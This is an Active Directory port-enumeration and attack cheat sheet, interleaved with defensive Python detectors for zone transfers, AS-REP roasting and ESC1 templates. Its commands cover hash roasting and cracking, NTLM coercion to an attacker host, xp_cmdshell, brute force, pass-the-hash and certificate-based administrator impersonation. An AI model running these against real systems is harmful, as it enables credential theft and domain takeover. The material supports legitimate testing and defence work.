Master Port Enumeration Cheat Sheet
Port 53 (DNS)
Zone Transfer Attempt
dig axfr @<TARGET-IP> <domain>
axfr requests zone transfer; @ sets the DNS server.
Look for:
- Full DNS zone dump (hostnames, internal IPs, server names)
- Naming conventions that leak environment details
- Potentially sensitive hosts (like "backup", "admin", "dev")
Basic DNS Queries
dig @<TARGET-IP> any <domain>
any asks for all record types; @ sets DNS server.
Look for:
- A records, MX records, SRV records
- VPN or remote-access services
- External-facing web apps or portals
Tip: Zone transfer = jackpot. Partial info from an ANY query still helps.
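Defender-side counterpart to the zone-transfer attempt above, added here as an example and not part of the original cheat sheet: it scans BIND-style transfer log lines (the sample lines are constructed) and reports AXFR/IXFR activity, served or denied, from any host outside an assumed list of legitimate secondaries.

```python
import re
import ipaddress

# Constructed sample of BIND transfer/security log lines (not real server output).
SAMPLE_LOG = """\
client @0x7f3a1c 192.0.2.10#53021 (corp.example): transfer of 'corp.example/IN': AXFR started (serial 2024050101)
client @0x7f3a1d 203.0.113.77#41877 (corp.example): transfer of 'corp.example/IN': AXFR started (serial 2024050101)
client @0x7f3a1e 192.0.2.11#60211 (corp.example): transfer of 'corp.example/IN': IXFR started (serial 2024050100 -> 2024050101)
client @0x7f3a1f 198.51.100.9#55310 (corp.example): zone transfer 'corp.example/IN' denied
"""

# Assumed: the only networks that should ever pull the zone (your secondaries).
ALLOWED_SECONDARIES = ["192.0.2.0/24"]

LINE_RE = re.compile(
    r"client (?:@0x[0-9a-f]+ )?(?P<ip>[0-9a-fA-F.:]+)#\d+ \((?P<zone>[^)]+)\): "
    r"(?:transfer of '[^']+': (?P<kind>AXFR|IXFR) started"
    r"|zone transfer '[^']+' (?P<denied>denied))"
)

def allowed(ip, nets):
    """True if ip falls inside any of the allowed secondary networks."""
    addr = ipaddress.ip_address(ip)
    return any(addr in ipaddress.ip_network(n) for n in nets)

def find_unexpected_transfers(log_text, allowed_nets=ALLOWED_SECONDARIES):
    """Return (ip, zone, status) for transfer events from hosts that are not secondaries.
    Denied attempts are reported too: a refused AXFR from an unknown host is reconnaissance."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        ip = m.group("ip")
        if allowed(ip, allowed_nets):
            continue  # expected replication traffic
        status = "denied" if m.group("denied") else f"{m.group('kind')} served"
        findings.append((ip, m.group("zone"), status))
    return findings
```

A served transfer to an unknown host means allow-transfer is too loose; a denied one still tells you who is probing.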
Port 88 (Kerberos)
Kerberos Pre-Auth Scan
nmap --script krb5-enum-users -p88 <TARGET-IP> --script-args krb5-enum-users.realm='<REALM>'
-p88 targets Kerberos; the script enumerates users against the given realm.
Look for:
- Usernames (especially service accounts)
- Accounts WITHOUT "requires pre-auth" (AS-REP roasting potential)
AS-REP Roasting
Once usernames are found, try requesting TGTs without pre-authentication:
GetNPUsers.py <REALM>/ -no-pass -usersfile users.txt -dc-ip <TARGET-IP> -format hashcat -outputfile asrep_hashes.txt
-no-pass skips password auth; -usersfile username list; -dc-ip domain controller; -format hashcat outputs crackable hashes; -outputfile saves them.
Look for: $krb5asrep$23$... hashes; crack with hashcat -m 18200 asrep_hashes.txt rockyou.txt.
Tip: Some AD misconfigurations allow user enumeration even anonymously.
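Added example, not from the original cheat sheet: the defender's view of the two Kerberos checks above. It audits a constructed userAccountControl export for the DONT_REQ_PREAUTH bit (the accounts GetNPUsers.py would roast) and groups constructed Event ID 4768 records by source IP where pre-auth type 0 meets an RC4 (0x17) ticket.

```python
# userAccountControl bit "Do not require Kerberos preauthentication".
UF_DONT_REQUIRE_PREAUTH = 0x400000

# Constructed directory export (not a real domain): sAMAccountName -> userAccountControl.
SAMPLE_USERS = {
    "jdoe":       0x10200,   # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD
    "svc_backup": 0x410200,  # same, plus DONT_REQUIRE_PREAUTH
    "legacy_app": 0x400200,  # NORMAL_ACCOUNT | DONT_REQUIRE_PREAUTH
    "krbtgt":     0x10202,   # disabled account
}

def accounts_without_preauth(users):
    """Accounts whose AS-REQ is answered without pre-auth: these are the roastable ones."""
    return sorted(sam for sam, uac in users.items() if uac & UF_DONT_REQUIRE_PREAUTH)

# Constructed Event ID 4768 (TGT requested) records, field names as in the event XML.
SAMPLE_4768 = [
    {"TargetUserName": "jdoe",       "PreAuthType": "2",  "TicketEncryptionType": "0x12", "IpAddress": "10.0.5.20"},
    {"TargetUserName": "svc_backup", "PreAuthType": "0",  "TicketEncryptionType": "0x17", "IpAddress": "10.0.9.99"},
    {"TargetUserName": "legacy_app", "PreAuthType": "0",  "TicketEncryptionType": "0x17", "IpAddress": "10.0.9.99"},
    {"TargetUserName": "svc_backup", "PreAuthType": "15", "TicketEncryptionType": "0x12", "IpAddress": "10.0.5.21"},
]

def asrep_roast_candidates(events):
    """4768 events consistent with AS-REP roasting: PreAuthType 0 (none) plus an RC4-HMAC
    (0x17) ticket. Grouped by requesting IP so one source asking for many accounts stands out."""
    by_ip = {}
    for e in events:
        if e["PreAuthType"] == "0" and e["TicketEncryptionType"].lower() == "0x17":
            by_ip.setdefault(e["IpAddress"], set()).add(e["TargetUserName"])
    return {ip: sorted(users) for ip, users in by_ip.items()}
```

Clearing the bit on the accounts the first function lists removes the roasting surface; the second gives you the alert logic for accounts that legitimately need it.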
Port 135 (MSRPC)
RPC Enumeration
rpcdump.py <TARGET-IP>
Look for:
- efsrpc pipe = possible PetitPotam attack
- spoolss pipe = possible PrinterBug attack
- samr = enumerate users, groups, domain info
- Other exposed RPC pipes
Tip: RPC is often ignored, and it's a goldmine if misconfigured.
Ports 139 / 445 (NetBIOS / SMB)
Anonymous share listing
smbclient -L //<TARGET-IP> -N
-L lists shares; -N no authentication.
Look for:
- Shares allowing guest/everyone access
- Shares like BACKUP, ADMIN$, C$
- Sensitive filenames (passwords, backups)
Enum4linux-ng
enum4linux-ng <TARGET-IP>
Look for:
- Password policies
- Computer accounts
Nmap SMB vuln check
nmap -p139,445 --script smb-enum-shares,smb-enum-users,smb-os-discovery,smb-vuln* <TARGET-IP>
-p ports to scan; scripts enumerate shares, users, OS details and known vulnerabilities.
Look for:
- Old vulnerabilities (MS08-067, EternalBlue, SMBGhost)
- SMB signing status (off = NTLM relay possible)
Tip: If SMB signing is disabled, NTLM relay is a real play.
Rapid checks (NetExec)
nxc smb <TARGET-IP> -u '' -p '' --shares
nxc smb <TARGET-IP> -u <user> -p <pass> --shares
nxc smb <TARGET-IP> -u <user> -H <NTLMHASH> --shares # PTH
--shares enumerates shares; -H passes an NTLM hash (pass-the-hash).
Browse/download
smbclient -N //<TARGET-IP>/<share> -c 'ls'
smbclient -N //<TARGET-IP>/<share> # interactive, use mget/get
-c 'ls' one-shot listing; otherwise interactive.
Ports 389 / 636 / 3268 / 3269 (LDAP / LDAPS / Global Catalog)
LDAP Search
ldapsearch -x -H ldap://<TARGET-IP> -b "dc=example,dc=com"
-x simple bind; -H URI; -b base DN.
Look for:
- Users and their attributes (servicePrincipalName, pwdLastSet, description)
- Groups like Domain Admins
- Computer objects
- GPP password remnants
Tip: If LDAP anonymous bind works, you're inside the house.
Quick LDAP auth check (NetExec)
nxc ldap <TARGET-IP> -u '' -p '' --kerberos
--kerberos requests Kerberos authentication; empty credentials test anonymous access.
Look for: anon/guest allowed, realm info leak.
Port 464 (Kerberos Password Service)
Skip unless:
- You found usernames and want to try password-change abuse.
Tip: Not usually directly exploitable without credentials.
Port 593 (RPC over HTTP)
Enumerate
nmap -p593 --script=rpcinfo <TARGET-IP>
rpcinfo lists available RPC services over HTTP.
-p593 targets RPC over HTTP; script enumerates registered endpoints.
Look for:
- Active HTTP RPC bindings
- Services like DCOM or Print Spooler
Tip: Rarely directly vulnerable, but may expose RPC pipes.
Port 1433 (Microsoft SQL Server)
Service Info Check
nmap -sV -p1433 --script ms-sql-info <TARGET-IP>
-sV version detection; the script extracts SQL Server details.
Login (SQL auth / domain)
mssqlclient.py <domain>/<user>:<pass>@<TARGET-IP>
# If SQL auth only, drop domain: mssqlclient.py <user>:<pass>@<TARGET-IP>
<domain>/<user> for AD; omit for SQL auth.
Coerce NetNTLMv2 (Responder)
EXEC xp_dirtree '\\<ATTACKER_IP>\share';
# Run while: responder -I <tun0>
Mine SQL error logs for creds
EXEC xp_readerrorlog 0, 1, N'Login failed';
EXEC xp_readerrorlog 0, 1, N'password';
xp_readerrorlog searches SQL logs for strings.
Look for: mistyped usernames/passwords recorded in error logs.
Enable/use xp_cmdshell (if permitted)
EXEC sp_configure 'show advanced options',1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE;
xp_cmdshell 'whoami';
Quick bruteforce
hydra -L /usr/share/seclists/Usernames/sql-server-usernames.txt \
-P /usr/share/seclists/Passwords/Common-Credentials/best110.txt \
-t 4 -f mssql://<TARGET-IP>
-L/-P user/pass lists; -t threads; -f stop on first hit.
Port 3389 (RDP)
RDP Security Settings
nmap -p3389 --script rdp-enum-encryption <TARGET-IP>
-p3389 targets RDP; the script checks encryption level and NLA.
Look for:
- Encryption level
- NLA enabled or not
- Weak ciphers
Screenshot (optional)
nmap -p3389 --script rdp-screenshot <TARGET-IP>
Look for:
- Login screen info
- Visible domain
Tip: No NLA or weak encryption? Brute forcing may work.
Port 5985 (WinRM)
Credential / hash check
nxc winrm <TARGET-IP> -u <user> -p <pass>
nxc winrm <TARGET-IP> -u <user> -H <NTLMHASH> # PTH
The winrm module tests credentials; -H passes an NTLM hash (pass-the-hash).
Shell
evil-winrm -i <TARGET-IP> -u <user> -p '<pass>'
evil-winrm -i <TARGET-IP> -u <user> -H <NTLMHASH>
KRB5CCNAME=<ticket.ccache> evil-winrm -i <TARGET-IP> -r <realm> -u <user> -k
-H NTLM hash; -k uses the Kerberos ticket in KRB5CCNAME.
Tip: Use Kerberos tickets (ccache) after certipy for DA shells.
AD CS (Certificate Services) - ESC1 (cross-service, LDAP/RPC)
Enumerate
certipy find -dc-ip <IP> -u <user> -p <pass> -enabled -vulnerable
find lists templates and CAs; -vulnerable highlights ESC paths.
Look for: EnrolleeSuppliesSubject + ClientAuth + Domain Users enroll.
Request cert as admin
certipy req -dc-ip <IP> -u <user> -p '<pass>' -ca <CA> -template <Template> \
-upn administrator@<domain> -dns <dc> -outfile administrator
-template vulnerable template; -upn spoofed identity; -outfile base name for the PFX.
Get TGT/hash from PFX
certipy auth -pfx administrator.pfx -dc-ip <IP>
# yields administrator.ccache and NT hash
auth converts the PFX to a Kerberos TGT and NT hash.
Use ticket
KRB5CCNAME=administrator.ccache impacket-wmiexec -k -no-pass administrator@<dc>
KRB5CCNAME=administrator.ccache evil-winrm -i <IP> -r <realm> -u administrator -k
KRB5CCNAME points tools to the Kerberos ticket.
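Added example (not certipy's code or the page's own): an audit of the four ESC1 conditions behind the "EnrolleeSuppliesSubject + ClientAuth + Domain Users enroll" check, run over constructed template records. Attribute names follow the AD certificate template schema; the `enroll` list and `enabled` flag are assumed stand-ins for what AD keeps in the template's security descriptor and the CA's published-template list.

```python
# Well-known AD CS template constants.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1  # msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x2          # msPKI-Enrollment-Flag: manager approval required
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}
# Principals whose Enroll right makes a template reachable by any domain account.
BROAD_PRINCIPALS = {"Domain Users", "Authenticated Users", "Domain Computers", "Everyone"}

def esc1_conditions(t):
    """Return the ESC1 conditions template dict t meets; all four present means ESC1.
    An empty EKU list is treated as usable for any purpose, including authentication."""
    met = []
    if t["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        met.append("enrollee supplies subject")
    ekus = set(t["pKIExtendedKeyUsage"])
    if not ekus or ekus & AUTH_EKUS:
        met.append("authentication EKU")
    if not (t["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS) and t["msPKI-RA-Signature"] == 0:
        met.append("no approval or signature gate")
    # 'enroll' is an assumed field; in AD this comes from the template's security descriptor.
    if set(t["enroll"]) & BROAD_PRINCIPALS:
        met.append("broad enrollment rights")
    return met

def is_esc1(t):
    return len(esc1_conditions(t)) == 4

def audit(templates):
    """Names of enabled templates that satisfy every ESC1 condition."""
    return [t["name"] for t in templates if t["enabled"] and is_esc1(t)]

# Constructed templates (not from a real CA). User mirrors the stock template's flags.
SAMPLE_TEMPLATES = [
    {"name": "User", "enabled": True, "msPKI-Certificate-Name-Flag": 0xA6000000,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4"],
     "msPKI-Enrollment-Flag": 0x29, "msPKI-RA-Signature": 0, "enroll": ["Domain Users"]},
    {"name": "VPNUsers", "enabled": True, "msPKI-Certificate-Name-Flag": 0x1,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
     "msPKI-Enrollment-Flag": 0x0, "msPKI-RA-Signature": 0, "enroll": ["Domain Users"]},
    {"name": "WebServerApproved", "enabled": True, "msPKI-Certificate-Name-Flag": 0x1,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1"],
     "msPKI-Enrollment-Flag": 0x2, "msPKI-RA-Signature": 0, "enroll": ["Domain Admins"]},
]
```

Breaking any one of the four conditions (clearing the subject flag, requiring manager approval, or narrowing who can enroll) is what closes the path.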
Port 5120 (Barracuda BBS)
Banner grabbing
nc -nv <TARGET-IP> 5120
-n numeric only; -v verbose to read banner.
Look for:
- Product/version info
- Default credential hints
- Vulnerable software versions
Tip: Often misconfigured or unpatched.
Ports 5985 / 47001 (WinRM / HTTPAPI)
Confirm Service
curl -i http://<TARGET-IP>:5985/wsman
curl -i http://<TARGET-IP>:47001/wsman
-i show headers; basic reachability check for WinRM endpoints.
Look for:
- Auth methods (Basic, NTLM, Kerberos)
- Domain or hostnames
Header probing
nmap -p5985,47001 --script http-headers,http-title <TARGET-IP>
-p WinRM/HTTPAPI ports; scripts pull headers/page titles.
Look for:
- Server type and software
- Verbose or leaking headers
Tip: WinRM open + creds = Remote PowerShell access.
Port 7680 (Pando / Windows Update Delivery Optimization)
Banner Grabbing
nc -nv <TARGET-IP> 7680
-n numeric; -v verbose to grab banner.
Look for:
- Windows Delivery Optimization
- Unexpected headers
Tip: Low value unless relayable or leaking.
Port 9389 (Active Directory Web Services)
Enumerate if possible
nmap -p9389 --script adsi-search --script-args 'adsi-search.base=""' <TARGET-IP>
-p9389 targets ADWS; the script queries ADSI; an empty base means rootDSE.
Look for:
- Confirm ADWS is running
- Try authenticated queries later if usernames are found
Tip: Usually needs creds to enumerate much.
Octopus Tentacle (Port 10934)
Banner Grab
nc -nv <TARGET-IP> 10934
-n numeric; -v verbose to read banner.
Service Version Detection
nmap -sV -p10934 <TARGET-IP>
-sV version detection; -p target Tentacle port.
SSL Certificate Check
openssl s_client -connect <TARGET-IP>:10934
s_client prints TLS handshake and certificate.